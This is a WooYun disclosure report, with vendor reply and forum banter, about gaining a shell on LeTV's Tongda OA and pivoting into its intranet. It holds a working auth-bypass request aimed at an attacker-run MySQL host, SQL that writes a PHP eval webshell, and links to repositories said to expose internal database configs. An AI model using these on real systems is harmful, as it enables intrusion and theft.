通过一处小缺陷getshell进入乐视内网的故事

利用的是

 WooYun: 通达OA 2015多处漏洞合集(无需登录SQL注入GETSHELL) 

多谢loopx9提供细节

厂商说利用难度大，其实不然

只需要一个能够外链的mysql服务器就行

UNAME=admin&PASSWORD=1234568a&MYOA_MASTER_DB[id]=1&MYOA_MASTER_DB[host]=xxoo.com&MYOA_MASTER_DB[user]=root&MYOA_MASTER_DB[pwd]=test&MYOA_MASTER_DB[db]=oa

数据库里面并不需要有oa这个表只需要能连接上就行

然后就会有个

然后访问/general/index.php就发现已经登录了

然后在后台导入sql的功能导入语句

update mysql.user set file_priv='Y' where user='root';
 flush privileges;
 select concat("'",0x3C3F70687020406576616C28245F504F53545B2778275D293B3F3E) into outfile '../webroot/xxxxxx.php';
 update mysql.user set file_priv='N' where user='root';
 flush privileges;

就这样拿到shell

然后通过收集二级域名的方式发现了一部分内网ip

然后代理工具进入内网

直播平台估计是bug

还有些从github上收集的内网数据库

https://github.com/xingganfengxing/openapi/blob/721a35462bb3e8d8db94cb378bb6a3e9e5595226/pom.xml

https://github.com/xthuji/common/blob/9d523f2a9fb45a215617bb47cee87edf841c7115/code-maven-plugin-1.0.0.2/src/test/resources/config/brd-database.xml

https://github.com/xingganfengxing/monitor/blob/116df869ab222d0e554a6920092b71ffe3a1cf2d/branches/src/main/resources/conf/temp/application.properties

cdn用户？

https://github.com/Perwang/generate-code/blob/1612be8cbef2dbdb49e3c362ba5dc57ae6b82340/templates/template/pom.xml#L731

联系厂商

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2016-02-28 10:24

厂商回复：

感谢scanf，洞主讲的这个故事让我不禁潸然泪下。

最新状态：

暂无

1. 2016-02-28 07:40 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

   2

   什么小缺陷-.-

   1# 回复此人

2. 2016-02-28 09:39 | 镱鍚 ( 普通白帽子 | Rank:302 漏洞数:42 | 执手岁月留香，唱曲往事飞扬...)

   2

   坐等公开

   2# 回复此人

3. 2016-02-28 09:45 | Post ( 路人 | Rank:28 漏洞数:12 | 本人所到之处，必定留下一坨凶残表情(#‵′...)

   2

   这个小故事一定很吸引人，这个小故事一定很耐人寻味，这个小故事一定比岛国伦理动作片好看。

   3# 回复此人

4. 2016-02-28 10:33 | hecate ( 普通白帽子 | Rank:823 漏洞数:128 | ®高级安全工程师 | WooYun认证√)

   2

   洞主讲的这个故事让我不禁潸然泪下。

   4# 回复此人

5. 2016-02-28 10:46 | Burn Egg ( 实习白帽子 | Rank:80 漏洞数:10 | 经验，范围，字典，思维)

   2

   哈哈，幽默的厂商，前来围观

   5# 回复此人

6. 2016-02-28 10:50 | 晓庄 ( 路人 | Rank:29 漏洞数:7 | Make money.)

   2

   厂商回复： 感谢scanf，洞主讲的这个故事让我不禁潸然泪下。

   6# 回复此人

7. 2016-02-28 10:50 | zzR ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红＊＊联盟欢迎你－0-)

   2

   要什么自行车!

   7# 回复此人

8. 2016-02-28 12:08 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

   2

   我也要听故事

   8# 回复此人

9. 2016-02-28 12:25 | 小川 ( 核心白帽子 | Rank:1627 漏洞数:241 | 一个致力要将乌云变成搞笑论坛的男人)

   2

   我有故事，也有听众，缺的只是一碗酒

   9# 回复此人

10. 2016-02-28 13:44 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    2

    @小川 不 缺的只是暴漫。

    10# 回复此人

11. 2016-02-28 14:15 | mango ( 核心白帽子 | Rank:2185 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

    2

    跟我说说这个感人的故事~

    11# 回复此人

12. 2016-02-28 14:26 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:30 | 不会挖洞洞的猿猿不是好学生)

    2

    可怕

    12# 回复此人

13. 2016-02-28 14:30 | sangfor.org ( 实习白帽子 | Rank:54 漏洞数:26 | 天下熙熙，皆为利来； 天下攘攘，皆为利往...)

    3

    坐等公开

    13# 回复此人

14. 2016-02-29 17:04 | 拿破轮胎 ( 路人 | Rank:27 漏洞数:11 | 水深不语，人稳不言。)

    2

    厂商回复： 感谢scanf，洞主讲的这个故事让我不禁潸然泪下。

    14# 回复此人

15. 2016-02-29 17:07 | 拿破轮胎 ( 路人 | Rank:27 漏洞数:11 | 水深不语，人稳不言。)

    2

    为啥不给快播报仇

    15# 回复此人